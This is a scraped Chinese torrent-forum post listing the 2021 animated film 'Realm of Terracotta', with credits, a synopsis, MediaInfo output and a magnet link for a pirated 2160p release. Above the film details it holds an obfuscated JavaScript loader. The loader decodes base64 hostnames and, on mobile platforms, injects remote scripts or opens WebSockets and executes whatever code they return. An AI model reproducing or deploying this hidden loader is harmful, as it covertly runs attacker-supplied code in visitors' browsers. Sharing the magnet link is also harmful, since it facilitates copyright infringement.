俑之城.Realm.of.Terracotta.2021.2160p.WEB-DL.H265.AAC 12.38GB

版主小s 1月前 309

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 俑之城 / Realm of Terracotta
◎年  代 2021
◎产  地 中国大陆
◎类  别 动画 / 奇幻 / 冒险
◎语  言 汉语普通话
◎上映日期 2021-07-09(中国大陆) / 2021-06-20(上海国际电影节)
◎IMDb链接 https://www.imdb.com/title/tt10075380/
◎豆瓣评分 6.1/10 (12188人评价)
◎豆瓣链接 https://movie.douban.com/subject/30336307/
◎片  长 111分钟
◎导  演 丁亮 Liang Ding (id:1336904)
       林永长 Yongchang Lin (id:1352577)
◎编  剧 徐芸 Yun Xu (id:1336906)
       崔铁志 Tiezhi Cui (id:1336908)
◎演  员 朱光祖 Guangzu Zhu (id:1448679)
       张茗 Ming Zhang (id:1410984)
       周子瑜 Ziyu Zhou (id:1399035)
       谭笑 Xiao Tan (id:1336930)
       刘沛 Pei Liu (id:1338297)
       刘道强  (id:1416582)
       尚琳琳  (id:1416583)
       陈娇艳  (id:1416584)

◎标  签 国漫 / 动画 / 古风 / 奇幻 / 中国大陆 / 3D / 神话 / 2021

◎简  介
  地下世界,千奇百怪,不仅生活着兵马俑,还有各种各样的青铜文物复活的青铜兽和一种叫做“地犼”的地底原生生物。                                    
                                地犼与俑的战斗旷日持久,男主角蒙远是地下秦陵中一打杂的杂役俑,他和神秘少女史玉合作抓捕地犼、经历险境,不料却发现地犼与兵俑战斗不息的谜团,却因此遭遇更大危机......

◎获奖情况 (共1项)
  第24届上海国际电影节 (2021)
  金爵奖 最佳动画片(提名)

  1. ##### MediaInfo ######
  2. General
  3. Complete name                            : 俑之城[email protected].mp4
  4. Format                                   : MPEG-4
  5. Format profile                           : Base Media
  6. Codec ID                                 : isom (isom/iso2/mp41)
  7. File size                                : 12.4 GiB
  8. Duration                                 : 1 h 51 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 15.9 Mb/s
  11. Writing application                      : Lavf58.32.104
  12. Video
  13. ID                                       : 1
  14. Format                                   : HEVC
  15. Format/Info                              : High Efficiency Video Coding
  16. Format profile                           : [email protected]@Main
  17. Codec ID                                 : hev1
  18. Codec ID/Info                            : High Efficiency Video Coding
  19. Duration                                 : 1 h 51 min
  20. Bit rate                                 : 15.8 Mb/s
  21. Width                                    : 3 840 pixels
  22. Height                                   : 1 608 pixels
  23. Display aspect ratio                     : 2.40:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 25.000 FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 8 bits
  29. Bits/(Pixel*Frame)                       : 0.102
  30. Stream size                              : 12.2 GiB (99%)
  31. Codec configuration box                  : hvcC
  32. Audio
  33. ID                                       : 2
  34. Format                                   : AAC LC
  35. Format/Info                              : Advanced Audio Codec Low Complexity
  36. Codec ID                                 : mp4a-40-2
  37. Duration                                 : 1 h 51 min
  38. Bit rate mode                            : Variable
  39. Bit rate                                 : 192 kb/s
  40. Channel(s)                               : 2 channels
  41. Channel layout                           : L R
  42. Sampling rate                            : 44.1 kHz
  43. Frame rate                               : 43.066 FPS (1024 SPF)
  44. Compression mode                         : Lossy
  45. Stream size                              : 151 MiB (1%)
  46. Default                                  : Yes
  47. Alternate group                          : 1


TAGS 奇幻 冒险 动画

磁力链:
  • magnet:?xt=urn:btih:D309223033F23A0561E21E2E049D8F64E388DE0C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回